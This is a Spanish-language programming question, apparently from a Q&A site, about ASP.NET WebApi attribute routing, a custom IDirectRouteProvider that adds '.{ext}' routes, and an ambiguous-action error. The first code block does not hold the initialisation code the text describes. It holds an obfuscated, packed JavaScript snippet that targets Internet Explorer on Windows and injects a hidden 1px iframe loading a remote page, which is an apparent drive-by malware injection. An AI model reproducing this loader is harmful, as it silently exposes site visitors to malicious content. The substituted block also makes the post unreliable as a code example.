<p>Estoy creando un servicio usando ASP.NET WebApi. Quiero añadir soporte para negociación del tipo de contenido basado en extensiones en el URI, así que he añadido lo siguiente al código de inicialización del servicio:</p>

<pre><code><sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript> 
</code></pre>

<p>Para que esto funcione necesito crear dos rutas para cada acción del controlador (estoy usando exclusivamente enrutamiento basado en atributos):</p>

<pre><code>[Route("item/{id}/details")]
[Route("item/{id}/details.{ext}")]
[HttpGet]
public ItemDetail[] GetItemDetails(int id)
{
  return itemsService.GetItemDetails(id);
}

[Route("item/{name}")]
[Route("item/{name}.{ext}")]
[HttpPost]
public int CreateItem(string name)
{
  return itemsService.Create(name);
}
</code></pre>

<p>Esto queda feo y hace que el código sea innecesariamente largo, así que investigué una forma de añadir la ruta con la extensión, automáticamente cuando se crea la ruta normal. Como resultado desarrollé una implementación personalizada de <code>IDirectRouteProvider</code> que puedo usar al registrar los atributos de ruta:</p>

<pre><code>config.MapHttpAttributeRoutes(new AutomaticExtensionRouteProvider());
</code></pre>

<p>El código del proveedor personalizado es:</p>

<pre><code>public class AutomaticExtensionRouteProvider : DefaultDirectRouteProvider
{
    protected override IReadOnlyList&lt;RouteEntry&gt; GetActionDirectRoutes(
      HttpActionDescriptor actionDescriptor,
      IReadOnlyList&lt;IDirectRouteFactory&gt; factories,
      IInlineConstraintResolver constraintResolver)
    {
        var result = base.GetActionDirectRoutes(actionDescriptor, factories, constraintResolver);
        var list = new List&lt;RouteEntry&gt;(result);
        foreach(var route in result.Where(r =&gt; !r.Route.RouteTemplate.EndsWith(".{ext}")))
        {
            var newTemplate = route.Route.RouteTemplate + ".{ext}";
            if (!result.Any(r =&gt; r.Route.RouteTemplate == newTemplate))
            {
                var entry = new RouteEntry(null, new HttpRoute(newTemplate,
                    new HttpRouteValueDictionary(route.Route.Defaults),
                    new HttpRouteValueDictionary(route.Route.Constraints),
                    new HttpRouteValueDictionary(route.Route.DataTokens)));
                list.Add(entry);
            }
        }
        return list.AsReadOnly();
    }
}
</code></pre>

<p>El problema es que esto funciona bien... pero falla en un caso: <strong>cuando la última parte de la ruta es un parámetro sin restricciones</strong>. Así pues, en el ejemplo anterior, la creación de rutas para <code>GetItemDetails</code> funciona, pero para <code>CreateItem</code> lanza lo siguiente:</p>

<pre><code>System.InvalidOperationException: Multiple actions were found that match the request:
CreateItem on type FooBar.Api.Controllers.ItemsController
CreateItem on type FooBar.Api.Controllers.ItemsController
   at System.Web.Http.Controllers.ApiControllerActionSelector.ActionSelectorCacheItem.SelectAction(HttpControllerContext controllerContext)
   at System.Web.Http.Controllers.ApiControllerActionSelector.SelectAction(HttpControllerContext controllerContext)
</code></pre>

<p>Me imagino de donde puede venir el problema: una cadena arbitraria cumple los patrones <code>{name}</code> y <code>{name}.{ext}</code>, por lo que el motor de WebApi se atraganta al intentar seleccionar la ruta adecuada. <strong>Pero entonces, ¿por qué funciona cuando se especifican las dos rutas explícitamente en atributos?</strong> Por lo que yo entiendo, la ruta que yo creo en la clase <code>AutomaticExtensionRouteProvider</code> es idéntica a la que se crea explícitamente con un atributo (y si depuro veo que en efecto así es).</p>

<p>Así pues, ¿qué está pasando aquí?</p>
